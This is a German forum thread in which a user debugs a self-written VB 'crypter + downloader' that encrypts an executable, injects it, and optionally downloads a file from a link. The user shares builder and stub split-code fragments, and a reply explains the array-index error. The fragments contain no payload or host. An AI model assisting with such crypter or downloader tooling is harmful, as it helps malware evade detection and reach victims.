VB splitted falsch? oO

  • Jo Hey Leute
    ich hab hier nen crypter + downlaoder geschrieben. wenn die download funktion ausgeschaltet ist klappt das crypten und injecten perfekkt. wenn jedoch die dl funktion eingeschaltet ist (auswählbar über CheckBox) dann kommt beim ausführen der crypted.exe (natürlich nach dem crypten) der fehler: Laufzeitfehler '9' - Index ausserhalb des gültigen Bereiches.
    Dann hab ich mit msgboxen überprüfft bis wohin der code gekommen is. dann hab ich herausgefunden das er beim injecten der gecrypteten file abschmiert, obwohl die daten richtig übergeben wurden...


    so wirds vom builder übergeben:


    Code
    1. Put #1, , strEncrypt(OriginalFile, CStr(Key)) & "||||||||||||||||||||" & Key _& "||||||||||||||||||||" _& DoDL & "||||||||||||||||||||" & strEncrypt(Link, Key)

    DoDl is als boolean der wert der checkbox. Link = der link.. strEncrypt is die verschlüsselung...


    bei der stub siehts so aus:


    Code
    1. splt = Split(ORGRS, "||||||||||||||||||||")
    2. DieDatei= splt(0)
    3. DerKey = splt(1)
    4. DoDL = splt(2)
    5. DerLink = splt(3)

    DoDL is wie gesagt schon der boolenische wert...


    alles is auch richtig übergeben habs wie schon gesagt mit msgboxen überprüft...


    EDIT// Unter Virtuellem XP kommt mit der DL Funktion der fehler: Runtime Error '13' - Type mismatch
    aber ohne dl funktion klappts auch hier perfekt...

  • Ist doch ganz klar:
    Du versuchst auf ein Element eines Array zuzugreifen, das nicht existiert.
    Sieh dir mal im Hexeditor deinen Anhang an.
    Das Splitten funktioniert offenbar nicht so, wie es sollte ;)